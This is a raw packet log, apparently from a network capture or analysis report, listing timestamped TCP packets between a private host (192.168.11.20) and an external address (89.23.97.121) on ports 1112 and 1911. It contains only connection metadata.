                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.223536968 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.223764896 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224029064 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224327087 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224615097 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224623919 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.224901915 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.225191116 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.225199938 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.225657940 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.225667953 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.225922108 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.226181984 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.226557970 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.226926088 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.227365971 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.227375031 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.227617979 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.227624893 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.228037119 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.228332996 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.228342056 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.228672028 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.228957891 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.229460001 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.229468107 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.229711056 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.229882956 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.230021000 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.230051041 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.230191946 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.230386972 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.230447054 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.230962992 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.230971098 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.231223106 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.231501102 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.232137918 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.232146025 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.232271910 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.232549906 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.232799053 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.233063936 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.233552933 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.234096050 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.234102964 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.234424114 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.234432936 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.235013962 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.235302925 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.235527039 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.235699892 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.235851049 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.500165939 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.500384092 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.500710011 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.500757933 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.501080990 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.501293898 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.501610041 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.501851082 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.502069950 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.502119064 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.502619982 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.502629042 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.503092051 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.503614902 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.504292965 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.504378080 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.504599094 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.505249977 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.505461931 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.505553961 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.505759954 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.505768061 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.506330967 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.506340981 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.506900072 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.507230043 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.507873058 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.507971048 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.508217096 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.508424044 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.508881092 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.511641979 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.512018919 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.783235073 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:37.783859968 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.059653044 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.102293968 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.106251001 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.379231930 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.379466057 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.380534887 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.661952019 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662103891 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662225962 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662339926 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662486076 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662576914 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662636042 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662698030 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662775040 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662800074 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662844896 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662898064 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662986994 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.662996054 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.663244963 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.935524940 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.935684919 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.935790062 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.935864925 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.935885906 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.935991049 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936033010 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936075926 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936228991 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936233044 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936342001 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936420918 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936487913 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936541080 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936681032 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936744928 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936778069 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.936892033 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937007904 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937031031 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937172890 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937200069 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937249899 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937386036 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937402010 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937550068 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937634945 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937726021 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937752962 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.937995911 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.208750010 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.208957911 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209086895 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209194899 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209265947 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209273100 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209359884 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209381104 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209480047 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209532022 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209585905 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209698915 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209727049 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209851980 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.209940910 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210026026 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210059881 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210160971 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210232973 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210283041 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210397005 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210516930 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210519075 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210633993 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210714102 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210747957 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210874081 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210962057 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.210999966 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211143017 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211246967 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211292982 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211344957 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211451054 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211466074 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211577892 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211685896 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211724997 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211834908 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211854935 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.211920023 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212043047 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212105036 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212155104 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212268114 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212301016 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212407112 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212505102 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212557077 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212666988 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212737083 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212845087 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212862015 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.212976933 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213093042 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213171959 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213202953 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213258982 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213368893 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.213625908 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482470036 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482537985 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482660055 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482702971 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482777119 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482867956 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.482973099 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483040094 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483088970 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483211040 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483323097 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483393908 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483479977 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483594894 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483702898 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483716965 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483788967 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483875036 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.483906031 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484021902 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484141111 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484256029 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484373093 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484436035 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484436035 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484504938 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484529972 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484648943 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484755993 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484833956 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484848976 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.484961033 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485018969 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485127926 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485193968 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485265970 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485311985 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485428095 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485536098 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485569000 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485697031 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485779047 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485825062 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485934973 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.485980988 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486006975 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486131907 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486215115 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486244917 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486363888 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486471891 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486485958 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486632109 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486655951 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486799002 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486856937 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.486972094 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487034082 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487095118 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487108946 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487219095 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487298965 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487359047 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487412930 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487534046 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487620115 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487653971 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487796068 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487910032 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.487998962 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.488116980 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.488230944 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:39.488267899 CET497491911192.168.11.2089.23.97.121
